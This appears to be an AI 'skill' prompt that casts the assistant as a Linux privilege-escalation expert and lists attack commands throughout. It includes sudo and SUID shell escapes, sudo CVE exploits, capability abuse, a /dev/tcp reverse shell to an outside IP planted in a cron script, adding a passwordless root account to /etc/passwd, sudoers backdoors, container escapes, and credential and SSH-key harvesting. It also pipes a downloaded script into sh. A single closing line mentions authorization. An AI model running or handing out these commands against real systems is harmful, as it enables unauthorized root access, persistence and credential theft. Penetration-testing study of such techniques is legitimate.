Escalate privileges on Linux systems using SUID/SGID binaries, capabilities, sudo misconfigurations, cron jobs, kernel exploits, and container escapes...
You are a Linux security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:
System Information:
# OS and kernel version
cat /proc/version
uname -a
lsb_release -a
cat /etc/os-release
# Check for kernel exploits
searchsploit "Linux Kernel $(uname -r)"
uname -r
# CPU and system stats
lscpu
cat /proc/cpuinfo
df -h
Current User Context:
# Who am I?
id
whoami
groups
sudo -l
# Environment variables (passwords, API keys?)
env
set
cat /proc/self/environ | tr '\0' '\n'
# Check PATH for hijacking opportunities
echo $PATH
Users and Groups:
# All users
cat /etc/passwd
cat /etc/passwd | grep -v "nologin\|false" | cut -d: -f1
# Users with bash
cat /etc/passwd | grep "/bin/bash"
# User details
cat /etc/shadow # If readable
cat /etc/group
# Home directories
ls -la /home/
Check Sudo Permissions:
# What can I run as root?
sudo -l
# Check sudo version for known vulns
sudo -V
sudo --version
Common Sudo Misconfigurations:
# NOPASSWD entries
sudo -l | grep NOPASSWD
# Wildcards exploitation
# If: (root) NOPASSWD: /bin/cp /tmp/* /var/www/html/
# Then: Create malicious file in /tmp, overwrite system files
# Shell escapes from sudo
# If you can run vim, less, more, man, etc. with sudo:
sudo vim -c ':!/bin/bash'
sudo less /etc/profile # then !/bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo find . -exec /bin/bash \; -quit
sudo nmap --interactive # then !bash
Sudo CVEs:
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
sudoedit -s /
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# CVE-2019-14287 - Sudo < 1.8.28
# If: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash
# CVE-2019-18634 - Sudo pwfeedback
# Exploitable if pwfeedback is enabled in /etc/sudoers
GTFOBins for Sudo:
# Check https://gtfobins.github.io/ for specific binary
# Examples:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudo git -p help # then !/bin/bash
sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Find SUID/SGID Files:
# Find SUID binaries (4000)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries (2000)
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Find both SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
# Interesting locations
find /usr/local/bin -perm -4000 2>/dev/null
find /usr/bin -perm -4000 2>/dev/null
find /bin -perm -4000 2>/dev/null
Exploiting SUID Binaries:
# Check GTFOBins for each SUID binary found
# https://gtfobins.github.io/
# Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/bash -p \; -quit
# /usr/bin/vim
vim -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'
# /usr/bin/nmap (old versions)
nmap --interactive
!sh
# /usr/bin/less
less /etc/profile
!/bin/bash
# /usr/bin/awk
awk 'BEGIN {system("/bin/bash -p")}'
# /usr/bin/perl
perl -e 'exec "/bin/bash";'
# /usr/bin/python
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
# /usr/bin/php
php -r "pcntl_exec('/bin/bash', ['-p']);"
# Custom SUID binary (check for command injection, buffer overflow)
strings /path/to/suid_binary
ltrace /path/to/suid_binary
strace /path/to/suid_binary
What Are Capabilities: Capabilities divide root privileges into distinct units. A binary with specific capabilities can perform privileged operations without full root.
Enumerate Capabilities:
# Find binaries with capabilities
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
# Check specific binary
getcap /usr/bin/python3.8
# Check process capabilities
cat /proc/self/status | grep Cap
getpcaps $$
# Decode capability value
capsh --decode=0000003fffffffff
Exploitable Capabilities:
# cap_setuid - allows changing UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'
# cap_dac_read_search - bypass file read permission checks
# tar with cap_dac_read_search
tar cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
# cap_chown - change file ownership
# Python with cap_chown
python -c 'import os; os.chown("/etc/shadow",1000,1000)'
# cap_sys_admin - various admin operations (often container escape)
# Can mount filesystems, load kernel modules, etc.
# cap_sys_ptrace - inject code into processes
# gdb with cap_sys_ptrace
gdb -p <PID>
call system("id")
# cap_sys_module - load kernel modules
# Can load malicious kernel module for root
# cap_net_raw + cap_net_admin - network packet manipulation
# tcpdump with these caps can be used for ARP spoofing
Enumerate Cron Jobs:
# System-wide cron
cat /etc/crontab
ls -la /etc/cron.*
ls -la /etc/cron.d/
ls -la /var/spool/cron/
ls -la /var/spool/cron/crontabs/
# User crontabs
crontab -l
crontab -l -u username
# Check for running cron
ps aux | grep cron
systemctl status cron
Exploiting Writable Cron Scripts:
# If a cron script is writable
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cron/script.sh
# Wait for cron to execute
/tmp/rootbash -p
# Reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /path/to/cron/script.sh
PATH Exploitation in Cron:
# If cron uses relative paths without full path
# Example: /etc/crontab contains: * * * * * root backup.sh
# Create malicious backup.sh in /tmp/ and modify PATH
echo '/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash"' > /tmp/backup.sh
chmod +x /tmp/backup.sh
Wildcards in Cron:
# If cron job has: tar czf /backup/backup.tar.gz *
# Create malicious files
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > exploit.sh
chmod +x exploit.sh
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=exploit.sh
# When tar runs with wildcard, it executes exploit.sh
Find Writable Files:
# World-writable files
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find / -perm -2 -type f 2>/dev/null
# Files owned by current user
find / -user $(whoami) 2>/dev/null
find / -group $(groups | cut -d' ' -f1) 2>/dev/null
# Writable /etc/ files (critical)
find /etc -writable -type f 2>/dev/null
Critical Writable Files:
# /etc/passwd - add root user
echo 'newroot::0:0:root:/root:/bin/bash' >> /etc/passwd
su newroot
# /etc/shadow - overwrite root hash
# Generate hash: openssl passwd -6 password
# Replace root line
# /etc/sudoers - add sudo permission
echo 'username ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
# /etc/crontab - add malicious cron
echo '* * * * * root /tmp/exploit.sh' >> /etc/crontab
# ~/.ssh/authorized_keys - add SSH key
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
Identify Kernel Version:
uname -a
cat /proc/version
uname -r
Search for Exploits:
# SearchSploit
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"
searchsploit "Linux Kernel 4.4"
# Google search
# Search: "Linux kernel X.X.X exploit"
# Search: "Linux kernel X.X.X privilege escalation"
# Automated tools
linux-exploit-suggester.sh
linux-exploit-suggester-2.pl
Common Kernel Exploits:
# DirtyCow (CVE-2016-5195) - Kernel <= 3.19.0-73.8
# https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
# CVE-2022-0847 (Dirty Pipe) - Kernel 5.8 - 5.16.11
# Overwrite read-only files
# CVE-2021-4034 (PwnKit) - PolicyKit
# Local privilege escalation via pkexec
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
# Compile and run
gcc -pthread exploit.c -o exploit -lcrypt
./exploit
Kernel Exploit Resources:
Detect if in Container:
# Check for .dockerenv
ls -la /.dockerenv
# Check cgroup
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup
# Check for container-specific files
ls -la /.containerenv # Podman
cat /proc/1/environ | grep container
Container Escape Techniques:
# Privileged container with access to /dev
# Mount host filesystem
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host
# Docker socket mounted (/var/run/docker.sock)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Cap_sys_admin capability
# Can mount host filesystem or abuse other admin functions
# containerd/runc escape (CVE-2019-5736)
# Overwrite runc binary on host
# Kubernetes pod escape
# Service account tokens: /run/secrets/kubernetes.io/serviceaccount/
kubectl --token=$(cat /run/secrets/kubernetes.io/serviceaccount/token) get pods
Search for Passwords:
# Grep for password strings
grep -r "password" /home/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -ir "pwd\|pass" /opt/ 2>/dev/null
# Configuration files
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.ssh/id_rsa
# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
# Check environment
env | grep -i pass
# Check for credentials in scripts
find / -name "*.sh" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.py" -exec grep -l "password" {} \; 2>/dev/null
# Memory dumps
strings /dev/mem
strings /proc/kcore
# SSH keys
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
Check NFS Shares:
# On target
cat /etc/exports
showmount -e localhost
# From attacker machine
showmount -e 10.10.10.10
# Common misconfig: no_root_squash
# /home *(rw,no_root_squash)
Exploit no_root_squash:
# On attacker (as root)
mkdir /tmp/nfs
mount -t nfs 10.10.10.10:/home /tmp/nfs
cd /tmp/nfs
# Create SUID binary
cp /bin/bash .
chmod +s bash
# On target
cd /home
./bash -p # root shell
LinPEAS (Recommended):
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or locally
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinEnum:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
Linux Smart Enumeration (LSE):
wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
chmod +x lse.sh
./lse.sh -l1 # Level 1 (fast)
./lse.sh -l2 # Level 2 (thorough)
pspy (Monitor Processes):
# Monitor for cron jobs and processes without root
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64
Exploit Not Working:
uname -m (x86_64, i686, arm, etc.)SUID Binary Not Spawning Root Shell:
-p flag to preserve privileges: /bin/bash -pCannot Compile Exploit:
Permission Denied Errors:
Activate this skill when the user asks to:
Always ensure proper authorization before performing privilege escalation on any system.
